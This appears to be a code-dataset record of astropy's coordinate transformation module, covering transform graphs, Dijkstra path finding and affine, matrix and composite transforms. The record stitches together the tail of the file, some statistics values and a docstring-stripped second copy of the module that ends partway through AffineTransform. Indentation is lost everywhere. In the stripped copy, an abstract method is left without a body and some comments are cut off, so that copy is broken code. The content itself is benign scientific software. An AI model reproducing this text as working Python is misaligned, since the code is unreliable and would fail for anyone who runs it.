fwd_frame = toframe.replicate_without_data(**kws)
else:
fwd_frame = toframe
fwd = supcall(from_diffless_fwd, fwd_frame)
if self._diff_attr_in_fromsys:
kws = {attrname: getattr(from_diffless, attrname) - halfdt}
from_diffless_back = from_diffless.replicate(**kws)
else:
from_diffless_back = from_diffless
if self._diff_attr_in_tosys:
kws = {attrname: getattr(toframe, attrname) - halfdt}
back_frame = toframe.replicate_without_data(**kws)
else:
back_frame = toframe
back = supcall(from_diffless_back, back_frame)
else:
if self._diff_attr_in_fromsys:
kws = {attrname: getattr(from_diffless, attrname) + dt}
from_diffless_fwd = from_diffless.replicate(**kws)
else:
from_diffless_fwd = from_diffless
if self._diff_attr_in_tosys:
kws = {attrname: getattr(toframe, attrname) + dt}
fwd_frame = toframe.replicate_without_data(**kws)
else:
fwd_frame = toframe
fwd = supcall(from_diffless_fwd, fwd_frame)
back = reprwithoutdiff
diffxyz += (fwd.cartesian - back.cartesian).xyz / dt
newdiff = CartesianDifferential(diffxyz)
reprwithdiff = reprwithoutdiff.data.to_cartesian().with_differentials(newdiff)
return reprwithoutdiff.realize_frame(reprwithdiff)
else:
return supcall(fromcoord, toframe)
class BaseAffineTransform(CoordinateTransform):
"""Base class for common functionality between the ``AffineTransform``-type
subclasses.
This base class is needed because ``AffineTransform`` and the matrix
transform classes share the ``_apply_transform()`` method, but have
different ``__call__()`` methods. ``StaticMatrixTransform`` passes in a
matrix stored as a class attribute, and both of the matrix transforms pass
in ``None`` for the offset. Hence, user subclasses would likely want to
subclass this (rather than ``AffineTransform``) if they want to provide
alternative transformations using this machinery.
"""
def _apply_transform(self, fromcoord, matrix, offset):
from .representation import (UnitSphericalRepresentation,
CartesianDifferential,
SphericalDifferential,
SphericalCosLatDifferential,
RadialDifferential)
data = fromcoord.data
has_velocity = 's' in data.differentials
# list of unit differentials
_unit_diffs = (SphericalDifferential._unit_differential,
SphericalCosLatDifferential._unit_differential)
unit_vel_diff = (has_velocity and
isinstance(data.differentials['s'], _unit_diffs))
rad_vel_diff = (has_velocity and
isinstance(data.differentials['s'], RadialDifferential))
# Some initial checking to short-circuit doing any re-representation if
# we're going to fail anyways:
if isinstance(data, UnitSphericalRepresentation) and offset is not None:
raise TypeError("Position information stored on coordinate frame "
"is insufficient to do a full-space position "
"transformation (representation class: {0})"
.format(data.__class__))
elif (has_velocity and (unit_vel_diff or rad_vel_diff) and
offset is not None and 's' in offset.differentials):
# Coordinate has a velocity, but it is not a full-space velocity
# that we need to do a velocity offset
raise TypeError("Velocity information stored on coordinate frame "
"is insufficient to do a full-space velocity "
"transformation (differential class: {0})"
.format(data.differentials['s'].__class__))
elif len(data.differentials) > 1:
# We should never get here because the frame initializer shouldn't
# allow more differentials, but this just adds protection for
# subclasses that somehow skip the checks
raise ValueError("Representation passed to AffineTransform contains"
" multiple associated differentials. Only a single"
" differential with velocity units is presently"
" supported (differentials: {0})."
.format(str(data.differentials)))
# If the representation is a UnitSphericalRepresentation, and this is
# just a MatrixTransform, we have to try to turn the differential into a
# Unit version of the differential (if no radial velocity) or a
# sphericaldifferential with zero proper motion (if only a radial
# velocity) so that the matrix operation works
if (has_velocity and isinstance(data, UnitSphericalRepresentation) and
not unit_vel_diff and not rad_vel_diff):
# retrieve just velocity differential
unit_diff = data.differentials['s'].represent_as(
data.differentials['s']._unit_differential, data)
data = data.with_differentials({'s': unit_diff}) # updates key
# If it's a RadialDifferential, we flat-out ignore the differentials
# This is because, by this point (past the validation above), we can
# only possibly be doing a rotation-only transformation, and that
# won't change the radial differential. We later add it back in
elif rad_vel_diff:
data = data.without_differentials()
# Convert the representation and differentials to cartesian without
# having them attached to a frame
rep = data.to_cartesian()
diffs = dict([(k, diff.represent_as(CartesianDifferential, data))
for k, diff in data.differentials.items()])
rep = rep.with_differentials(diffs)
# Only do transform if matrix is specified. This is for speed in
# transformations that only specify an offset (e.g., LSR)
if matrix is not None:
# Note: this applies to both representation and differentials
rep = rep.transform(matrix)
# TODO: if we decide to allow arithmetic between representations that
# contain differentials, this can be tidied up
if offset is not None:
newrep = (rep.without_differentials() +
offset.without_differentials())
else:
newrep = rep.without_differentials()
# We need a velocity (time derivative) and, for now, are strict: the
# representation can only contain a velocity differential and no others.
if has_velocity and not rad_vel_diff:
veldiff = rep.differentials['s'] # already in Cartesian form
if offset is not None and 's' in offset.differentials:
veldiff = veldiff + offset.differentials['s']
newrep = newrep.with_differentials({'s': veldiff})
if isinstance(fromcoord.data, UnitSphericalRepresentation):
# Special-case this because otherwise the return object will think
# it has a valid distance with the default return (a
# CartesianRepresentation instance)
if has_velocity and not unit_vel_diff and not rad_vel_diff:
# We have to first represent as the Unit types we converted to,
# then put the d_distance information back in to the
# differentials and re-represent as their original forms
newdiff = newrep.differentials['s']
_unit_cls = fromcoord.data.differentials['s']._unit_differential
newdiff = newdiff.represent_as(_unit_cls, newrep)
kwargs = dict([(comp, getattr(newdiff, comp))
for comp in newdiff.components])
kwargs['d_distance'] = fromcoord.data.differentials['s'].d_distance
diffs = {'s': fromcoord.data.differentials['s'].__class__(
copy=False, **kwargs)}
elif has_velocity and unit_vel_diff:
newdiff = newrep.differentials['s'].represent_as(
fromcoord.data.differentials['s'].__class__, newrep)
diffs = {'s': newdiff}
else:
diffs = newrep.differentials
newrep = newrep.represent_as(fromcoord.data.__class__) # drops diffs
newrep = newrep.with_differentials(diffs)
elif has_velocity and unit_vel_diff:
# Here, we're in the case where the representation is not
# UnitSpherical, but the differential *is* one of the UnitSpherical
# types. We have to convert back to that differential class or the
# resulting frame will think it has a valid radial_velocity. This
# can probably be cleaned up: we currently have to go through the
# dimensional version of the differential before representing as the
# unit differential so that the units work out (the distance length
# unit shouldn't appear in the resulting proper motions)
diff_cls = fromcoord.data.differentials['s'].__class__
newrep = newrep.represent_as(fromcoord.data.__class__,
diff_cls._dimensional_differential)
newrep = newrep.represent_as(fromcoord.data.__class__, diff_cls)
# We pulled the radial differential off of the representation
# earlier, so now we need to put it back. But, in order to do that, we
# have to turn the representation into a repr that is compatible with
# having a RadialDifferential
if has_velocity and rad_vel_diff:
newrep = newrep.represent_as(fromcoord.data.__class__)
newrep = newrep.with_differentials(
{'s': fromcoord.data.differentials['s']})
return newrep
class AffineTransform(BaseAffineTransform):
"""
A coordinate transformation specified as a function that yields a 3 x 3
cartesian transformation matrix and a tuple of displacement vectors.
See `~astropy.coordinates.builtin_frames.galactocentric.Galactocentric` for
an example.
Parameters
----------
transform_func : callable
A callable that has the signature ``transform_func(fromcoord, toframe)``
and returns: a (3, 3) matrix that operates on ``fromcoord`` in a
Cartesian representation, and a ``CartesianRepresentation`` with
(optionally) an attached velocity ``CartesianDifferential`` to represent
a translation and offset in velocity to apply after the matrix
operation.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
TypeError
If ``transform_func`` is not callable
"""
def __init__(self, transform_func, fromsys, tosys, priority=1,
register_graph=None):
if not six.callable(transform_func):
raise TypeError('transform_func is not callable')
self.transform_func = transform_func
super(AffineTransform, self).__init__(fromsys, tosys, priority=priority,
register_graph=register_graph)
def __call__(self, fromcoord, toframe):
M, vec = self.transform_func(fromcoord, toframe)
newrep = self._apply_transform(fromcoord, M, vec)
return toframe.realize_frame(newrep)
class StaticMatrixTransform(BaseAffineTransform):
"""
A coordinate transformation defined as a 3 x 3 cartesian
transformation matrix.
This is distinct from DynamicMatrixTransform in that this kind of matrix is
independent of frame attributes. That is, it depends *only* on the class of
the frame.
Parameters
----------
matrix : array-like or callable
A 3 x 3 matrix for transforming 3-vectors. In most cases will
be unitary (although this is not strictly required). If a callable,
will be called *with no arguments* to get the matrix.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
ValueError
If the matrix is not 3 x 3
"""
def __init__(self, matrix, fromsys, tosys, priority=1, register_graph=None):
if six.callable(matrix):
matrix = matrix()
self.matrix = np.array(matrix)
if self.matrix.shape != (3, 3):
raise ValueError('Provided matrix is not 3 x 3')
super(StaticMatrixTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
def __call__(self, fromcoord, toframe):
newrep = self._apply_transform(fromcoord, self.matrix, None)
return toframe.realize_frame(newrep)
class DynamicMatrixTransform(BaseAffineTransform):
"""
A coordinate transformation specified as a function that yields a
3 x 3 cartesian transformation matrix.
This is similar to, but distinct from StaticMatrixTransform, in that the
matrix for this class might depend on frame attributes.
Parameters
----------
matrix_func : callable
A callable that has the signature ``matrix_func(fromcoord, toframe)`` and
returns a 3 x 3 matrix that converts ``fromcoord`` in a cartesian
representation to the new coordinate system.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
Raises
------
TypeError
If ``matrix_func`` is not callable
"""
def __init__(self, matrix_func, fromsys, tosys, priority=1,
register_graph=None):
if not six.callable(matrix_func):
raise TypeError('matrix_func is not callable')
self.matrix_func = matrix_func
def _transform_func(fromcoord, toframe):
return self.matrix_func(fromcoord, toframe), None
super(DynamicMatrixTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
def __call__(self, fromcoord, toframe):
M = self.matrix_func(fromcoord, toframe)
newrep = self._apply_transform(fromcoord, M, None)
return toframe.realize_frame(newrep)
class CompositeTransform(CoordinateTransform):
"""
A transformation constructed by combining together a series of single-step
transformations.
Note that the intermediate frame objects are constructed using any frame
attributes in ``toframe`` or ``fromframe`` that overlap with the intermediate
frame (``toframe`` favored over ``fromframe`` if there's a conflict). Any frame
attributes that are not present use the defaults.
Parameters
----------
transforms : sequence of `CoordinateTransform` objects
The sequence of transformations to apply.
fromsys : class
The coordinate frame class to start from.
tosys : class
The coordinate frame class to transform into.
priority : number
The priority if this transform when finding the shortest
coordinate transform path - large numbers are lower priorities.
register_graph : `TransformGraph` or `None`
A graph to register this transformation with on creation, or
`None` to leave it unregistered.
collapse_static_mats : bool
If `True`, consecutive `StaticMatrixTransform` will be collapsed into a
single transformation to speed up the calculation.
"""
def __init__(self, transforms, fromsys, tosys, priority=1,
register_graph=None, collapse_static_mats=True):
super(CompositeTransform, self).__init__(fromsys, tosys,
priority=priority,
register_graph=register_graph)
if collapse_static_mats:
transforms = self._combine_statics(transforms)
self.transforms = tuple(transforms)
def _combine_statics(self, transforms):
"""
Combines together sequences of `StaticMatrixTransform`s into a single
transform and returns it.
"""
newtrans = []
for currtrans in transforms:
lasttrans = newtrans[-1] if len(newtrans) > 0 else None
if (isinstance(lasttrans, StaticMatrixTransform) and
isinstance(currtrans, StaticMatrixTransform)):
combinedmat = np.dot(lasttrans.matrix, currtrans.matrix)
newtrans[-1] = StaticMatrixTransform(combinedmat,
lasttrans.fromsys,
currtrans.tosys)
else:
newtrans.append(currtrans)
return newtrans
def __call__(self, fromcoord, toframe):
curr_coord = fromcoord
for t in self.transforms:
# build an intermediate frame with attributes taken from either
# `fromframe`, or if not there, `toframe`, or if not there, use
# the defaults
# TODO: caching this information when creating the transform may
# speed things up a lot
frattrs = {}
for inter_frame_attr_nm in t.tosys.get_frame_attr_names():
if hasattr(toframe, inter_frame_attr_nm):
attr = getattr(toframe, inter_frame_attr_nm)
frattrs[inter_frame_attr_nm] = attr
elif hasattr(fromcoord, inter_frame_attr_nm):
attr = getattr(fromcoord, inter_frame_attr_nm)
frattrs[inter_frame_attr_nm] = attr
curr_toframe = t.tosys(**frattrs)
curr_coord = t(curr_coord, curr_toframe)
# this is safe even in the case where self.transforms is empty, because
# coordinate objects are immutible, so copying is not needed
return curr_coord
# map class names to colorblind-safe colors
trans_to_color = OrderedDict()
trans_to_color[AffineTransform] = '#555555' # gray
trans_to_color[FunctionTransform] = '#783001' # dark red-ish/brown
trans_to_color[FunctionTransformWithFiniteDifference] = '#d95f02' # red-ish
trans_to_color[StaticMatrixTransform] = '#7570b3' # blue-ish
trans_to_color[DynamicMatrixTransform] = '#1b9e77' # green-ish
| 40.47741
| 109
| 0.602392
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import heapq
import inspect
import subprocess
from warnings import warn
from abc import ABCMeta, abstractmethod
from collections import defaultdict, OrderedDict
import numpy as np
from .. import units as u
from ..utils.compat import suppress
from ..utils.compat.funcsigs import signature
from ..utils.exceptions import AstropyWarning
from ..extern import six
from ..extern.six.moves import range
from .representation import REPRESENTATION_CLASSES
__all__ = ['TransformGraph', 'CoordinateTransform', 'FunctionTransform',
'BaseAffineTransform', 'AffineTransform',
'StaticMatrixTransform', 'DynamicMatrixTransform',
'FunctionTransformWithFiniteDifference', 'CompositeTransform']
class TransformGraph(object):
def __init__(self):
self._graph = defaultdict(dict)
self.invalidate_cache()
@property
def _cached_names(self):
if self._cached_names_dct is None:
self._cached_names_dct = dct = {}
for c in self.frame_set:
nm = getattr(c, 'name', None)
if nm is not None:
dct[nm] = c
return self._cached_names_dct
@property
def frame_set(self):
if self._cached_frame_set is None:
self._cached_frame_set = frm_set = set()
for a in self._graph:
frm_set.add(a)
for b in self._graph[a]:
frm_set.add(b)
return self._cached_frame_set.copy()
@property
def frame_attributes(self):
if self._cached_frame_attributes is None:
result = {}
for frame_cls in self.frame_set:
result.update(frame_cls.frame_attributes)
self._cached_frame_attributes = result
return self._cached_frame_attributes
def invalidate_cache(self):
self._cached_names_dct = None
self._cached_frame_set = None
self._cached_frame_attributes = None
self._shortestpaths = {}
self._composite_cache = {}
def add_transform(self, fromsys, tosys, transform):
if not inspect.isclass(fromsys):
raise TypeError('fromsys must be a class')
if not inspect.isclass(tosys):
raise TypeError('tosys must be a class')
if not six.callable(transform):
raise TypeError('transform must be callable')
self._graph[fromsys][tosys] = transform
self.invalidate_cache()
def remove_transform(self, fromsys, tosys, transform):
if fromsys is None or tosys is None:
if not (tosys is None and fromsys is None):
raise ValueError('fromsys and tosys must both be None if either are')
if transform is None:
raise ValueError('cannot give all Nones to remove_transform')
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
if b is transform:
del agraph[b]
break
else:
raise ValueError('Could not find transform {0} in the '
'graph'.format(transform))
else:
if transform is None:
self._graph[fromsys].pop(tosys, None)
else:
curr = self._graph[fromsys].get(tosys, None)
if curr is transform:
self._graph[fromsys].pop(tosys)
else:
raise ValueError('Current transform from {0} to {1} is not '
'{2}'.format(fromsys, tosys, transform))
self.invalidate_cache()
def find_shortest_path(self, fromsys, tosys):
inf = float('inf')
if tosys is fromsys:
if tosys not in self._graph[fromsys]:
return [tosys], 0
if tosys in self._graph[fromsys]:
# this will also catch the case where tosys is fromsys, but has
# a defined transform.
t = self._graph[fromsys][tosys]
return [fromsys, tosys], float(t.priority if hasattr(t, 'priority') else 1)
# otherwise, need to construct the path:
if fromsys in self._shortestpaths:
# already have a cached result
fpaths = self._shortestpaths[fromsys]
if tosys in fpaths:
return fpaths[tosys]
else:
return None, inf
# use Dijkstra's algorithm to find shortest path in all other cases
nodes = []
for a in self._graph:
if a not in nodes:
nodes.append(a)
for b in self._graph[a]:
if b not in nodes:
nodes.append(b)
if fromsys not in nodes or tosys not in nodes:
# certainly no way to get from one to the other
return None, inf
edgeweights = {}
# construct another graph that is a dict of dicts of priorities
# (used as edge weights in Dijkstra's algorithm)
for a in self._graph:
edgeweights[a] = aew = {}
agraph = self._graph[a]
for b in agraph:
aew[b] = float(agraph[b].priority if hasattr(agraph[b], 'priority') else 1)
q = [[inf, i, n, []] for i, n in enumerate(nodes) if n is not fromsys]
q.insert(0, [0, -1, fromsys, []])
result = {}
while len(q) > 0:
d, orderi, n, path = heapq.heappop(q)
if d == inf:
result[n] = (None, d)
for d, orderi, n, path in q:
result[n] = (None, d)
break
else:
result[n] = (path, d)
path.append(n)
if n not in edgeweights:
continue
for n2 in edgeweights[n]:
if n2 not in result:
for i in range(len(q)):
if q[i][2] == n2:
break
else:
raise ValueError('n2 not in heap - this should be impossible!')
newd = d + edgeweights[n][n2]
if newd < q[i][0]:
q[i][0] = newd
q[i][3] = list(path)
heapq.heapify(q)
self._shortestpaths[fromsys] = result
return result[tosys]
def get_transform(self, fromsys, tosys):
if not inspect.isclass(fromsys):
raise TypeError('fromsys is not a class')
if not inspect.isclass(tosys):
raise TypeError('tosys is not a class')
path, distance = self.find_shortest_path(fromsys, tosys)
if path is None:
return None
transforms = []
currsys = fromsys
for p in path[1:]:
transforms.append(self._graph[currsys][p])
currsys = p
fttuple = (fromsys, tosys)
if fttuple not in self._composite_cache:
comptrans = CompositeTransform(transforms, fromsys, tosys,
register_graph=False)
self._composite_cache[fttuple] = comptrans
return self._composite_cache[fttuple]
def lookup_name(self, name):
return self._cached_names.get(name, None)
def get_names(self):
return list(six.iterkeys(self._cached_names))
def to_dot_graph(self, priorities=True, addnodes=[], savefn=None,
savelayout='plain', saveformat=None, color_edges=True):
nodes = []
for a in self._graph:
if a not in nodes:
nodes.append(a)
for b in self._graph[a]:
if b not in nodes:
nodes.append(b)
for node in addnodes:
if node not in nodes:
nodes.append(node)
nodenames = []
invclsaliases = dict([(v, k) for k, v in six.iteritems(self._cached_names)])
for n in nodes:
if n in invclsaliases:
nodenames.append('{0} [shape=oval label="{0}\\n`{1}`"]'.format(n.__name__, invclsaliases[n]))
else:
nodenames.append(n.__name__ + '[ shape=oval ]')
edgenames = []
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
transform = agraph[b]
pri = transform.priority if hasattr(transform, 'priority') else 1
color = trans_to_color[transform.__class__] if color_edges else 'black'
edgenames.append((a.__name__, b.__name__, pri, color))
lines = ['digraph AstropyCoordinateTransformGraph {']
lines.append('; '.join(nodenames) + ';')
for enm1, enm2, weights, color in edgenames:
labelstr_fmt = '[ {0} {1} ]'
if priorities:
priority_part = 'label = "{0}"'.format(weights)
else:
priority_part = ''
color_part = 'color = "{0}"'.format(color)
labelstr = labelstr_fmt.format(priority_part, color_part)
lines.append('{0} -> {1}{2};'.format(enm1, enm2, labelstr))
lines.append('')
lines.append('overlap=false')
lines.append('}')
dotgraph = '\n'.join(lines)
if savefn is not None:
if savelayout == 'plain':
with open(savefn, 'w') as f:
f.write(dotgraph)
else:
args = [savelayout]
if saveformat is not None:
args.append('-T' + saveformat)
proc = subprocess.Popen(args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = proc.communicate(dotgraph)
if proc.returncode != 0:
raise IOError('problem running graphviz: \n' + stderr)
with open(savefn, 'w') as f:
f.write(stdout)
return dotgraph
def to_networkx_graph(self):
import networkx as nx
nxgraph = nx.Graph()
for a in self._graph:
if a not in nxgraph:
nxgraph.add_node(a)
for b in self._graph[a]:
if b not in nxgraph:
nxgraph.add_node(b)
for a in self._graph:
agraph = self._graph[a]
for b in agraph:
transform = agraph[b]
pri = transform.priority if hasattr(transform, 'priority') else 1
color = trans_to_color[transform.__class__]
nxgraph.add_edge(a, b, weight=pri, color=color)
return nxgraph
def transform(self, transcls, fromsys, tosys, priority=1, **kwargs):
def deco(func):
# ``register_graph=self`` stores it in the transform graph
# automatically
transcls(func, fromsys, tosys, priority=priority,
register_graph=self, **kwargs)
return func
return deco
# <-------------------Define the builtin transform classes-------------------->
@six.add_metaclass(ABCMeta)
class CoordinateTransform(object):
def __init__(self, fromsys, tosys, priority=1, register_graph=None):
if not inspect.isclass(fromsys):
raise TypeError('fromsys must be a class')
if not inspect.isclass(tosys):
raise TypeError('tosys must be a class')
self.fromsys = fromsys
self.tosys = tosys
self.priority = float(priority)
if register_graph:
# this will do the type-checking when it adds to the graph
self.register(register_graph)
else:
if not inspect.isclass(fromsys) or not inspect.isclass(tosys):
raise TypeError('fromsys and tosys must be classes')
self.overlapping_frame_attr_names = overlap = []
if (hasattr(fromsys, 'get_frame_attr_names') and
hasattr(tosys, 'get_frame_attr_names')):
# the if statement is there so that non-frame things might be usable
# if it makes sense
for from_nm in fromsys.get_frame_attr_names():
if from_nm in tosys.get_frame_attr_names():
overlap.append(from_nm)
def register(self, graph):
graph.add_transform(self.fromsys, self.tosys, self)
def unregister(self, graph):
graph.remove_transform(self.fromsys, self.tosys, self)
@abstractmethod
def __call__(self, fromcoord, toframe):
class FunctionTransform(CoordinateTransform):
def __init__(self, func, fromsys, tosys, priority=1, register_graph=None):
if not six.callable(func):
raise TypeError('func must be callable')
with suppress(TypeError):
sig = signature(func)
kinds = [x.kind for x in sig.parameters.values()]
if (len(x for x in kinds if x == sig.POSITIONAL_ONLY) != 2
and sig.VAR_POSITIONAL not in kinds):
raise ValueError('provided function does not accept two arguments')
self.func = func
super(FunctionTransform, self).__init__(fromsys, tosys,
priority=priority, register_graph=register_graph)
def __call__(self, fromcoord, toframe):
res = self.func(fromcoord, toframe)
if not isinstance(res, self.tosys):
raise TypeError('the transformation function yielded {0} but '
'should have been of type {1}'.format(res, self.tosys))
if fromcoord.data.differentials and not res.data.differentials:
warn("Applied a FunctionTransform to a coordinate frame with "
"differentials, but the FunctionTransform does not handle "
"differentials, so they have been dropped.", AstropyWarning)
return res
class FunctionTransformWithFiniteDifference(FunctionTransform):
def __init__(self, func, fromsys, tosys, priority=1, register_graph=None,
finite_difference_frameattr_name='obstime',
finite_difference_dt=1*u.second,
symmetric_finite_difference=True):
super(FunctionTransformWithFiniteDifference, self).__init__(func,
fromsys, tosys, priority, register_graph)
self.finite_difference_frameattr_name = finite_difference_frameattr_name
self.finite_difference_dt = finite_difference_dt
self.symmetric_finite_difference = symmetric_finite_difference
@property
def finite_difference_frameattr_name(self):
return self._finite_difference_frameattr_name
@finite_difference_frameattr_name.setter
def finite_difference_frameattr_name(self, value):
if value is None:
self._diff_attr_in_fromsys = self._diff_attr_in_tosys = False
else:
diff_attr_in_fromsys = value in self.fromsys.frame_attributes
diff_attr_in_tosys = value in self.tosys.frame_attributes
if diff_attr_in_fromsys or diff_attr_in_tosys:
self._diff_attr_in_fromsys = diff_attr_in_fromsys
self._diff_attr_in_tosys = diff_attr_in_tosys
else:
raise ValueError('Frame attribute name {} is not a frame '
'attribute of {} or {}'.format(value,
self.fromsys,
self.tosys))
self._finite_difference_frameattr_name = value
def __call__(self, fromcoord, toframe):
from .representation import (CartesianRepresentation,
CartesianDifferential)
supcall = self.func
if fromcoord.data.differentials:
# this is the finite difference case
if callable(self.finite_difference_dt):
dt = self.finite_difference_dt(fromcoord, toframe)
else:
dt = self.finite_difference_dt
halfdt = dt/2
from_diffless = fromcoord.realize_frame(fromcoord.data.without_differentials())
reprwithoutdiff = supcall(from_diffless, toframe)
# first we use the existing differential to compute an offset due to
# the already-existing velocity, but in the new frame
fromcoord_cart = fromcoord.cartesian
if self.symmetric_finite_difference:
fwdxyz = (fromcoord_cart.xyz +
fromcoord_cart.differentials['s'].d_xyz*halfdt)
fwd = supcall(fromcoord.realize_frame(CartesianRepresentation(fwdxyz)), toframe)
backxyz = (fromcoord_cart.xyz -
fromcoord_cart.differentials['s'].d_xyz*halfdt)
back = supcall(fromcoord.realize_frame(CartesianRepresentation(backxyz)), toframe)
else:
fwdxyz = (fromcoord_cart.xyz +
fromcoord_cart.differentials['s'].d_xyz*dt)
fwd = supcall(fromcoord.realize_frame(CartesianRepresentation(fwdxyz)), toframe)
back = reprwithoutdiff
diffxyz = (fwd.cartesian - back.cartesian).xyz / dt
# now we compute the "induced" velocities due to any movement in
# the frame itself over time
attrname = self.finite_difference_frameattr_name
if attrname is not None:
if self.symmetric_finite_difference:
if self._diff_attr_in_fromsys:
kws = {attrname: getattr(from_diffless, attrname) + halfdt}
from_diffless_fwd = from_diffless.replicate(**kws)
else:
from_diffless_fwd = from_diffless
if self._diff_attr_in_tosys:
kws = {attrname: getattr(toframe, attrname) + halfdt}
fwd_frame = toframe.replicate_without_data(**kws)
else:
fwd_frame = toframe
fwd = supcall(from_diffless_fwd, fwd_frame)
if self._diff_attr_in_fromsys:
kws = {attrname: getattr(from_diffless, attrname) - halfdt}
from_diffless_back = from_diffless.replicate(**kws)
else:
from_diffless_back = from_diffless
if self._diff_attr_in_tosys:
kws = {attrname: getattr(toframe, attrname) - halfdt}
back_frame = toframe.replicate_without_data(**kws)
else:
back_frame = toframe
back = supcall(from_diffless_back, back_frame)
else:
if self._diff_attr_in_fromsys:
kws = {attrname: getattr(from_diffless, attrname) + dt}
from_diffless_fwd = from_diffless.replicate(**kws)
else:
from_diffless_fwd = from_diffless
if self._diff_attr_in_tosys:
kws = {attrname: getattr(toframe, attrname) + dt}
fwd_frame = toframe.replicate_without_data(**kws)
else:
fwd_frame = toframe
fwd = supcall(from_diffless_fwd, fwd_frame)
back = reprwithoutdiff
diffxyz += (fwd.cartesian - back.cartesian).xyz / dt
newdiff = CartesianDifferential(diffxyz)
reprwithdiff = reprwithoutdiff.data.to_cartesian().with_differentials(newdiff)
return reprwithoutdiff.realize_frame(reprwithdiff)
else:
return supcall(fromcoord, toframe)
class BaseAffineTransform(CoordinateTransform):
def _apply_transform(self, fromcoord, matrix, offset):
from .representation import (UnitSphericalRepresentation,
CartesianDifferential,
SphericalDifferential,
SphericalCosLatDifferential,
RadialDifferential)
data = fromcoord.data
has_velocity = 's' in data.differentials
# list of unit differentials
_unit_diffs = (SphericalDifferential._unit_differential,
SphericalCosLatDifferential._unit_differential)
unit_vel_diff = (has_velocity and
isinstance(data.differentials['s'], _unit_diffs))
rad_vel_diff = (has_velocity and
isinstance(data.differentials['s'], RadialDifferential))
# Some initial checking to short-circuit doing any re-representation if
# we're going to fail anyways:
if isinstance(data, UnitSphericalRepresentation) and offset is not None:
raise TypeError("Position information stored on coordinate frame "
"is insufficient to do a full-space position "
"transformation (representation class: {0})"
.format(data.__class__))
elif (has_velocity and (unit_vel_diff or rad_vel_diff) and
offset is not None and 's' in offset.differentials):
raise TypeError("Velocity information stored on coordinate frame "
"is insufficient to do a full-space velocity "
"transformation (differential class: {0})"
.format(data.differentials['s'].__class__))
elif len(data.differentials) > 1:
# allow more differentials, but this just adds protection for
# subclasses that somehow skip the checks
raise ValueError("Representation passed to AffineTransform contains"
" multiple associated differentials. Only a single"
" differential with velocity units is presently"
" supported (differentials: {0})."
.format(str(data.differentials)))
# If the representation is a UnitSphericalRepresentation, and this is
# just a MatrixTransform, we have to try to turn the differential into a
# Unit version of the differential (if no radial velocity) or a
# sphericaldifferential with zero proper motion (if only a radial
# velocity) so that the matrix operation works
if (has_velocity and isinstance(data, UnitSphericalRepresentation) and
not unit_vel_diff and not rad_vel_diff):
# retrieve just velocity differential
unit_diff = data.differentials['s'].represent_as(
data.differentials['s']._unit_differential, data)
data = data.with_differentials({'s': unit_diff}) # updates key
# If it's a RadialDifferential, we flat-out ignore the differentials
elif rad_vel_diff:
data = data.without_differentials()
# Convert the representation and differentials to cartesian without
# having them attached to a frame
rep = data.to_cartesian()
diffs = dict([(k, diff.represent_as(CartesianDifferential, data))
for k, diff in data.differentials.items()])
rep = rep.with_differentials(diffs)
# Only do transform if matrix is specified. This is for speed in
# transformations that only specify an offset (e.g., LSR)
if matrix is not None:
# Note: this applies to both representation and differentials
rep = rep.transform(matrix)
# TODO: if we decide to allow arithmetic between representations that
# contain differentials, this can be tidied up
if offset is not None:
newrep = (rep.without_differentials() +
offset.without_differentials())
else:
newrep = rep.without_differentials()
# We need a velocity (time derivative) and, for now, are strict: the
# representation can only contain a velocity differential and no others.
if has_velocity and not rad_vel_diff:
veldiff = rep.differentials['s'] # already in Cartesian form
if offset is not None and 's' in offset.differentials:
veldiff = veldiff + offset.differentials['s']
newrep = newrep.with_differentials({'s': veldiff})
if isinstance(fromcoord.data, UnitSphericalRepresentation):
# Special-case this because otherwise the return object will think
# it has a valid distance with the default return (a
# CartesianRepresentation instance)
if has_velocity and not unit_vel_diff and not rad_vel_diff:
# We have to first represent as the Unit types we converted to,
# then put the d_distance information back in to the
# differentials and re-represent as their original forms
newdiff = newrep.differentials['s']
_unit_cls = fromcoord.data.differentials['s']._unit_differential
newdiff = newdiff.represent_as(_unit_cls, newrep)
kwargs = dict([(comp, getattr(newdiff, comp))
for comp in newdiff.components])
kwargs['d_distance'] = fromcoord.data.differentials['s'].d_distance
diffs = {'s': fromcoord.data.differentials['s'].__class__(
copy=False, **kwargs)}
elif has_velocity and unit_vel_diff:
newdiff = newrep.differentials['s'].represent_as(
fromcoord.data.differentials['s'].__class__, newrep)
diffs = {'s': newdiff}
else:
diffs = newrep.differentials
newrep = newrep.represent_as(fromcoord.data.__class__) # drops diffs
newrep = newrep.with_differentials(diffs)
elif has_velocity and unit_vel_diff:
# Here, we're in the case where the representation is not
diff_cls = fromcoord.data.differentials['s'].__class__
newrep = newrep.represent_as(fromcoord.data.__class__,
diff_cls._dimensional_differential)
newrep = newrep.represent_as(fromcoord.data.__class__, diff_cls)
# We pulled the radial differential off of the representation
# earlier, so now we need to put it back. But, in order to do that, we
# have to turn the representation into a repr that is compatible with
# having a RadialDifferential
if has_velocity and rad_vel_diff:
newrep = newrep.represent_as(fromcoord.data.__class__)
newrep = newrep.with_differentials(
{'s': fromcoord.data.differentials['s']})
return newrep
class AffineTransform(BaseAffineTransform):
def __init__(self, transform_func, fromsys, tosys, priority=1,
register_graph=None):
if not six.callable(transform_func):
raise TypeError('transform_func is not callable')
self.transform_func = transform_func
super(AffineTransform, self).__init__(fromsys, tosys, priority=priority,
register_graph=register_graph)
def __call__(self, fromcoord, toframe):
